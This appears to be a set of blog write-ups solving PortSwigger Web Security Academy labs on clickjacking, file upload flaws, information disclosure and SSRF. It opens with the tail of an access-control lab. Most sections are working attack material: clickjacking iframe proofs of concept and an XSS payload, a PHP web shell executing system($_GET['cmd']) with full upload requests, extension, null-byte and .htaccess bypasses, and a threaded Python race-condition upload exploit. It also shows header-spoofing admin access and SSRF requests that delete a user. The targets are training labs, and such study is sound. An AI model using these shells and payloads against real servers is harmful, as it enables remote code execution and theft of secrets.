User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a23006b03751b2f82317e77003700cf.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=eTKyIURujXUmmlLuCGQOI3JdlsTHCuBW

Now we login as wiener in private window and grep his cookies,

w6lav5K5TaPMf70tzPfAMt9M8QPZMsRx

Now we try to replace this in previous /admin-roles/, and we remove the

Referer: https://0a23006b03751b2f82317e77003700cf.web-security-academy.net/admin

we got 401 unauthorized,

So after changing the username to wiener and adding that Referer back and send this request will solve the lab,

GET /admin-roles?username=wiener&action=upgrad

PortsWigger Clickjacking Labs - November 2025

Sun, 16 Nov 2025 00:00:00 GMT

Clickjacking

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.
Consider the following example:
- A web user accesses a decoy website (perhaps this is a link provided by an email) and clicks on a button to win a prize.
- Unknowingly, they have been deceived by an attacker into pressing an alternative hidden button and this results in the payment of an account on another site.
- This is an example of a clickjacking attack.
- The technique depends upon the incorporation of an invisible, actionable web page (or multiple pages) containing a button or hidden link, say, within an iframe.
- The iframe is overlaid on top of the user's anticipated decoy web page content.
- This attack differs from a CSRF attack in that the user is required to perform an action such as a button click whereas a CSRF attack depends upon forging an entire request without the user's knowledge or input.
It can be blocked by CSP
Properly Configuring X-Frame-Options in Header
Frame Buster Scripts which will bust the iframe tag.

Lab 1 : Basic clickjacking with CSRF token protection

First we will login with given creds,
- wiener:peter

<style>
    iframe {
        position:relative;
        width:1500;
        height: 900;
        opacity: 0.5;
        z-index: 1;
    }
    div {
        position:absolute;
        top:540;
        left:240;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0adb00d6037a92268009dac600620081.web-security-academy.net/my-account"></iframe>

After viewing the exploit, it looks like this

After reducing opacity:0.0001 it looks like this,

Lab 2 : Clickjacking with form input data prefilled from a URL Parameter

Again as previous lab we have to login using given creds,
- wiener:peter

Difference between this and previous lab is that we can add email in GET request itself so we will fill our email in it and try to phish the victim to click on,

<style>
    iframe {
        position:relative;
        width:1500;
        height: 900;
        opacity: 0.5;
        z-index: 1;
    }
    div {
        position:absolute;
        top:540;
        left:240;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a1a001903a367bc81a30cca00b000d2.web-security-academy.net/my-account?email=test@test.com"></iframe>

I keep opacity 0.5 so we can how this looks like when email is filled and click button,
other wise opacity will be 0.0001 so user can't see it

Lab 3 : Clickjacking with a frame buster script

Again we will log in with given creds,
- wiener:peter

So if we try previous technique then it wont work simply,

So we have to bypass this protection which is frame buster.

<style>
    iframe {
        position:relative;
        width:1500;
        height: 900;
        opacity: 0.5;
        z-index: 1;
    }
    div {
        position:absolute;
        top:540;
        left:240;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0ab9005c04cc320681d5e3f50098008e.web-security-academy.net/my-account?email=test@test.com"></iframe>

[!note] Notice the use of the sandbox="allow-forms" attribute that neutralizes the frame buster script.

After doing this it works perfectly,

Lab 4 : Exploiting clickjacking vulnerability to trigger DOM-based XXS

It has submit feedback functionality and this lab contains xxs so we have to first check whether it present in this form,

Name is reflecting so we can try XXS payloads here,

I tried multiple payloads of XXS but it didn't work until one,
- <script>alert(0)</script> - Failed
- <script>alert("0")</script> - Failed
<img src=x onerror=alert(0)> - Works

So now we will craft out clickjacking payload,

here is the whole URL which will goes into POC and we have to invoke print() so we replace onerror with that.

https://0ab4008404fd821e808c030a0007008f.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult

<style>
    iframe {
        position:relative;
        width:1135;
        height: 600;
        opacity: 0.5;
        z-index: 2;
    }
    div {
        position:absolute;
        top:520;
        left:80;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0ab4008404fd821e808c030a0007008f.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

Lab 5 : Multistap clickjacking

So again creds is given so we have to login with it,
- wiener:peter

I try to fill the email field by giving parameters in URL and it works, so we can use this whole url in clickjacking POC

<style>
    iframe {
        position:relative;
        width:1135;
        height: 600;
        opacity: 0.5;
        z-index: 2;
    }
    .div1 {
        position:absolute;
        top:520;
        left:70;
        z-index: 1;
    }
    .div2 {
        position:absolute;
        top:310;
        left:200;
        z-index: 1;
    }
</style>
<div class="div1">Click me first</div>
<div class="div2">Click me next</div>
<iframe src="https://0a3f00ef047ed58581834d2500a600c3.web-security-academy.net/my-account"></iframe>

So there is nothing special but we have to just add two click me which is Click me first and Click me next for confirmation page.

Now we will deliver the payload and it work!!

PortsWigger File upload vulnerabilities Labs - November 2025

Sun, 16 Nov 2025 00:00:00 GMT

File upload vulnerabilities

File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size.
Failing to properly enforce restrictions on these could mean that even a basic image upload function can be used to upload arbitrary and potentially dangerous files instead.
This could even include server-side script files that enable remote code execution.
In some cases, the act of uploading the file is in itself enough to cause damage.
Other attacks may involve a follow-up HTTP request for the file, typically to trigger its execution by the server.

Lab 1: Remote code execution via web shell upload

To avail the upload functionality we have to log in using given creds wiener:peter,
Here we can see avatar upload appears and we just have to upload basic php webshell and get the secret from carlos user.

So tried to upload this basic PHP shell which uses SYSTEM to execute commands, and capture that req,

<!DOCTYPE html>
<html>
	<head>
		<title>example webshell</title>
	</head>
	<body>
		<?php
			system($_GET['cmd']);
		?>
	</body>
</html>

POST /my-account/avatar HTTP/1.1
Host: 0aeb00e4030de4cc8158ed55003c00de.web-security-academy.net
Connection: keep-alive
Content-Length: 552
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0aeb00e4030de4cc8158ed55003c00de.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRN2qajyTK7vyBV5r
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00e4030de4cc8158ed55003c00de.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=IxXI6VWr8pzru7ELqgN9zlfsB8n4Mo0H

------WebKitFormBoundaryRN2qajyTK7vyBV5r
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: application/octet-stream

<!DOCTYPE html>
<html>
<head>
<title>example webshell</title>
</head>
<body>
<?php
system($_GET['cmd']);
?>
</body>
</html>
------WebKitFormBoundaryRN2qajyTK7vyBV5r
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryRN2qajyTK7vyBV5r
Content-Disposition: form-data; name="csrf"

nlhQonXV4LBKhQxttXGS50odez98jR3T
------WebKitFormBoundaryRN2qajyTK7vyBV5r--

So now we just have to go to /files/avatars/shell.php location execute this file with its cmd parameter with any command we want,

https://0aeb00e4030de4cc8158ed55003c00de.web-security academy.net/files/avatars/shell.php?cmd=id

I tried to run id and it worked so now we can grep secret and submit and by submitting it we will solve the lab,
This is particular URL with parameters,

https://0aeb00e4030de4cc8158ed55003c00de.web-security-academy.net/files/avatars/shell.php?cmd=cat%20/home/carlos/secret

[!hint] This is basically chaining of vulnerability like we have file upload vulnerability and we use it to upload shell and get RCE vulnerability.

Lab 2: Web shell upload via Content-Type restriction bypass

To avail the upload functionality we have to log in using given creds wiener:peter,
Here we can see avatar upload appears and we just have to upload basic php webshell and get the secret from carlos user.
one catch is that there is content-type restriction which prevent users to upload any unexpected file but it is user-controllable so we can bypass it.

POST /my-account/avatar HTTP/1.1
Host: 0aca00a50467484a866109f400ec00aa.web-security-academy.net
Connection: keep-alive
Content-Length: 552
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0aca00a50467484a866109f400ec00aa.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8ycy7YePiWBIJlF
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aca00a50467484a866109f400ec00aa.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=GAGbcXGatHwFgukdKaG4xpEjHhd3xcgH

------WebKitFormBoundaryH8ycy7YePiWBIJlF
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: application/octet-stream

<!DOCTYPE html>
<html>
<head>
<title>example webshell</title>
</head>
<body>
<?php
system($_GET['cmd']);
?>
</body>
</html>
------WebKitFormBoundaryH8ycy7YePiWBIJlF
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryH8ycy7YePiWBIJlF
Content-Disposition: form-data; name="csrf"

tF3ThN8bOP8Fnzsz4HfOaCP6K04TcHwi
------WebKitFormBoundaryH8ycy7YePiWBIJlF--

This gives me error, ==Sorry, file type application/octet-stream is not allowed Only image/jpeg and image/png are allowed Sorry, there was an error uploading your file.==
So maybe we can change content-type to png and it bypass the restriction and upload it, and it works perfectly.
This time i used another payload to read file directly to save time,

<?php echo file_get_contents('/home/carlos/secret'); ?>

https://0aca00a50467484a866109f400ec00aa.web-security-academy.net/files/avatars/shell.php

Lab 3: Web shell upload via path traversal

everything other things such as login and image upload functionality is same as previous lab,
But In this lab, we have to exploit path traversal vulnerability and by chaining it we have to execute out shell,

If we upload same shell same as before it works but this just print the content of php,
here is the shell.php,

<?php echo file_get_contents('/home/carlos/secret'); ?>

So i tried to add ../ and i URL encode / it and then upload the shell and when i try to access shell.php it renders,
Here is why it doesn't works first case and works in second case,
1. It doesn't render it because it saved in static folder where it treated as just static text.
2. But when we do ../ it upload the file in parent directory and this static thing fails and we can execute it, although doing directly ../ this not worked because / is sanitized in backend so i just encode it with %2F and it works.
Example vulnerable flow (pseudo)

// VULNERABLE
$uploaddir = '/var/www/app/static/avatars';
$filename = $_FILES['avatar']['name'];         // receives "..%2Fshell.php"
if (strpos($filename, '..') !== false) abort; // naive check (fails here if filename still encoded)
$dest = $uploaddir . '/' . $filename;         // framework decodes later -> becomes '/var/www/app/static/avatars/../shell.php'
// move_uploaded_file writes file to /var/www/app/static/shell.php (which may be inside document root)

------WebKitFormBoundaryACFkCQsTbpDaRYgF
Content-Disposition: form-data; name="avatar"; filename="..%2Fshell.php"
Content-Type: application/octet-stream

And now when we access the file we can see secret, and also we can see that file is in /files not in /files/avatars means /avatars is static directory.

Lab 4: Web shell upload via extension blacklist bypass

There will some blacklisting defense in this lab so we have to bypass that using different techniques,
Same as previous lab we have to login using given creds,

Now we capture upload req, and as expected it give 403 on shell upload,

POST /my-account/avatar HTTP/1.1
Host: 0adb00c904b6a72282c9515400e900f3.web-security-academy.net
Connection: keep-alive
Content-Length: 474
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0adb00c904b6a72282c9515400e900f3.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAGr6ncFnZKKh51ed
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0adb00c904b6a72282c9515400e900f3.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=gw5C1ORibabx8X7n4iUK3uWG2QEdW0u6

------WebKitFormBoundaryAGr6ncFnZKKh51ed
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundaryAGr6ncFnZKKh51ed
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryAGr6ncFnZKKh51ed
Content-Disposition: form-data; name="csrf"

Jjk83eNf6hSjXTWkM7e0IC7wTd8TtuGd
------WebKitFormBoundaryAGr6ncFnZKKh51ed--

here is the shell.php

<?php echo file_get_contents('/home/carlos/secret'); ?>

So now we have to brute force the .php extension and try those which can bypass blacklist,
This is are some of them,

.php
.php3
.php4
.php5
.php7
.phtml

This many are works perfectly and we got 200 on it,

.php3
.php4
.php5
.php7

when i tried to access one of these it again don't render and show me plaintext so i tried previous trick %2F but not worked,
Because maybe this is properly sanitized that you can't do path traversal so even if i upload php shell i can't able to execute it.

So i tried another technique which is uploading .htaccess file with our own definition of another custom extension with its content-type,

AddType application/x-httpd-php .l33t

POST /my-account/avatar HTTP/1.1
Host: 0adb00c904b6a72282c9515400e900f3.web-security-academy.net
Connection: keep-alive
Content-Length: 456
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0adb00c904b6a72282c9515400e900f3.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDM4TB2X7iyGMaA2B
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0adb00c904b6a72282c9515400e900f3.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=gw5C1ORibabx8X7n4iUK3uWG2QEdW0u6

------WebKitFormBoundaryDM4TB2X7iyGMaA2B
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: application/octet-stream

AddType application/x-httpd-php .l33t

------WebKitFormBoundaryDM4TB2X7iyGMaA2B
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryDM4TB2X7iyGMaA2B
Content-Disposition: form-data; name="csrf"

Jjk83eNf6hSjXTWkM7e0IC7wTd8TtuGd
------WebKitFormBoundaryDM4TB2X7iyGMaA2B--

Now tried to upload shell.php by changing .php to l33t and it successfully take it,

And when we accessed it, it rendered perfectly,

https://0adb00c904b6a72282c9515400e900f3.web-security-academy.net/files/avatars/shell.l33t

Lab 5: Web shell upload via file extension

We have to login using using given creds to avail upload functionality,

In normal uploading shell.php it fails and throws 403 forbidden error,

First thing that comes in mind is that to try all php extensions with and without little obfuscation,
So for that i used this wordlist, PHP Extensions List by PayloadsAllTheThings.
Setting up intruder and start the attack...

.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.php8
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
.inc

This 4 succeed and got 200 OK and file successfully uploaded,
What does this means,
- This is called Null Byte Injection in which we put null byte after .php extension and then .jpg so it basically get separated and server is checking that file must end with .jpg which fulfilled and we pass the check.

.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg

When i tried to access the shell.php it executed and got the secret (Note: PHP shell is same as used previous) and by submitting this we solve the lab.

Lab 6: Remote code execution via polyglot web shell upload

We have to log in to your own account using the following credentials: wiener:peter to avail upload functionality,

Again tried vanilla upload technique of shell.php but failed,
So now we have to try something called # polyglot web shell which means a single file that is valid in multiple formats at the same time.
GIF89a; is nothing but GIF file signature or magic bytes.
==Server checks files magic bytes and if it match with that GIF then allow it.==

I tried and it works and file uploaded successfully, and submit the secret and solve the lab.

Lab 7: Web shell upload via race condition

We have to log in to my own account using the following credentials: wiener:peter to avail upload functionality.

So in this lab, we to exploit race condition to upload web shell and this is the vulnerable code given in hint,
This is code tells that our uploaded file is first stored to /avatars and then checkViruses() and checkFileType function invokes and if it fails then file will be delete.

<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
    if($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?>

Here is the problem with this code,

move_uploaded_file()  → file exists at: avatars/shell.php  ✔
checkViruses()        → takes time (100–500ms)              ⏳
checkFileType()       → takes time (small delay)            ⏳
unlink()              → deletes file if fail                ❌

So for this task we have to make script which will try instantly after uploading file before it deletes it,

import threading
import requests

TARGET = "https://0a1b00b70350262080455d4c00c40005.web-security-academy.net"
UPLOAD_URL = TARGET + "/my-account/avatar"
SHELL_URL  = TARGET + "/files/avatars/shell.php"

COOKIE = {
    "session": "qmCJXS6lmtLH2X5xl8B8XwhE6gwuF2tI"
}

# PHP payload used in your request
php_payload = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"

# Full multipart-body EXACTLY as your req
def build_multipart():
    return {
        "avatar": ("shell.php", php_payload, "application/octet-stream"),
        "user": (None, "wiener"),
        "csrf": (None, "MZmaj6ucabT9hqJa3OTq8Pahmw1eImlN")
    }

# Normal headers (requests auto-generates multipart boundaries)
headers = {
    "User-Agent": "Mozilla/5.0",
    "Referer": TARGET + "/my-account?id=wiener",
}

def upload_thread():
    while True:
        try:
            requests.post(
                UPLOAD_URL,
                files=build_multipart(),
                cookies=COOKIE,
                headers=headers,
                timeout=2,
            )
        except:
            pass

def trigger_thread():
    while True:
        try:
            r = requests.get(SHELL_URL, cookies=COOKIE, timeout=2)
            if "secret" in r.text or len(r.text.strip()) > 0:
                print("\n[+] RACE WON! File contents:")
                print(r.text)
                exit(0)
        except:
            pass

# Spawn race threads
for _ in range(20):       # increase to 50 if lab is slow
    threading.Thread(target=upload_thread, daemon=True).start()
    threading.Thread(target=trigger_thread, daemon=True).start()

# Keep main thread alive
while True:
    pass

And we successfully win the race condition and we got the secret and after submitting it we solve the lab

PortsWigger Information Disclosure Labs - November 2025

Sun, 16 Nov 2025 00:00:00 GMT

Information disclosure - Sensitive Data Exposure

Information disclosure, also known as information leakage, is when a website unintentionally reveals sensitive information to its users.
Depending on the context, websites may leak all kinds of information to a potential attacker, including:
- Data about other users, such as usernames or financial information
- Sensitive commercial or business data
- Technical details about the website and its infrastructure

Lab 1 : Information disclosure in error message

We just have to some how invoke error and it will reveal some error code along with some info,

https://0a3e00cf03a03559804026700079003d.web-security-academy.net/product?productId=1

Make productId=1 to productId=abc and we got version

Submit it and we solved the lab

Lab 2 : Information disclosure on debug page

After accessing the index page we will see source code using view-source and what i find is that one interesting comment,
It is a path of PHPINFO page which has SECRET

<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->

By submitting this key, we solve the lab.

wt30ohe9kx8idw7a8joy6f8er9yrzrqo

Lab 3 : Source code disclosure via backup files

After accessing lab we will try to access the robots.txt and we find one entry,

In this directory we find another file which backup java file,
Which have database password indeed.

package data.productcatalog;

import common.db.JdbcConnectionBuilder;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class ProductTemplate implements Serializable
{
    static final long serialVersionUID = 1L;

    private final String id;
    private transient Product product;

    public ProductTemplate(String id)
    {
        this.id = id;
    }

    private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException
    {
        inputStream.defaultReadObject();

        ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
                "org.postgresql.Driver",
                "postgresql",
                "localhost",
                5432,
                "postgres",
                "postgres",
                "136c1aibxmmgd8lbzshi2pch3koui6u5"
        ).withAutoCommit();
        try
        {
            Connection connect = connectionBuilder.connect(30);
            String sql = String.format("SELECT * FROM products WHERE id = '%s' LIMIT 1", id);
            Statement statement = connect.createStatement();
            ResultSet resultSet = statement.executeQuery(sql);
            if (!resultSet.next())
            {
                return;
            }
            product = Product.from(resultSet);
        }
        catch (SQLException e)
        {
            throw new IOException(e);
        }
    }

    public String getId()
    {
        return id;
    }

    public Product getProduct()
    {
        return product;
    }
}

Here is the Database Password, and by submitting this we solve the lab

136c1aibxmmgd8lbzshi2pch3koui6u5

Lab 4 : Authentication bypass via information disclosure

We have to login using given creds,
- wiener:peter

Now after this i tried to capture the /admin req and i got unauthorized,

So i tried use TRACE request (TRACE used for diagnostic purposes and it often harmless, but occasionally leads to the disclosure of sensitive information)
Request

TRACE /admin HTTP/1.1
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP

Response

HTTP/1.1 200 OK
Content-Type: message/http
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 802

TRACE /admin HTTP/1.1
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
Connection: close
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP
X-Custom-IP-Authorization: 14.139.110.137

This is interesting header which leaks the information which tells that it is doing IP Based Authentication for admin access which can be bypass.

X-Custom-IP-Authorization: 14.139.110.137

We take this header and put it into our request and make the IP as 127.0.0.1 which means it will allow this host,

X-Custom-IP-Authorization: 127.0.0.1

Whole GET Request with above header,

GET /admin HTTP/1.1
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP
X-Custom-IP-Authorization: 127.0.0.1

We will just simple add this parameters to delete carlos user to solve lab,

GET /admin/delete?username=carlos

Lab 5 : Information disclosure in version control history

Our aim is to gain password of administrator and delete the carlos user,
So i find for some sensitive directories and found one which is .git.

I found some data inside config file,

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[user]
	email = carlos@carlos-montoya.net
	name = Carlos Montoya

There is another commit file which looks sensitive COMMIT_EDITMSG and it has this msg.

To dump this whole .git i used git-dumper tool and dump it for better look,

Now we can see git logs and previous commits and diff, and from there we found password of administrator,

Here is administrator:0ic26vp708alt77qexyz creds so we can log in with this and delete carlos user,

PortsWigger Server Side Request Foregery (SSRF) Labs - November 2025

Sun, 16 Nov 2025 00:00:00 GMT

Server Side Request Forgery

Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.
In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials.

Lab 1: Basic SSRF against the local server

After Accessing the labs we just have to view details page and check the stocks and capture that req,

We can see that it is /product/stock API with some parameters,

POST /product/stock HTTP/1.1
Host: 0aec00920488b14a831574bd00f400be.web-security-academy.net
Connection: keep-alive
Content-Length: 107
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0aec00920488b14a831574bd00f400be.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aec00920488b14a831574bd00f400be.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=prucCPckJHbFkihl7fKpuxwB6UD5jFJB

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Now after URL Decoding the body parameters we can see that there is URL which is requesting some site so we can try localhost URL,

stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

By Replacing with this, and url encode it (optional)

stockApi=http://localhost/admin/delete?username=carlos

It gives 302 found which means that it is successful and user carlos is deleted.

Lab 2: Basic SSRF against another back-end system

After Accessing the labs we just have to view details page and check the stocks and capture that req,

POST /product/stock HTTP/1.1
Host: 0a64008904342da18004175b007f00ec.web-security-academy.net
Connection: keep-alive
Content-Length: 96
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a64008904342da18004175b007f00ec.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a64008904342da18004175b007f00ec.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=KPWArg1rlSYSP2gZWhS3QGG4w684zBT3

stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Now in this lab we have to brute force thought IP range 192.168.0.X,

POST /product/stock HTTP/1.1
Host: 0a64008904342da18004175b007f00ec.web-security-academy.net
Connection: close
Content-Length: 40
sec-ch-ua-platform: "Windows"
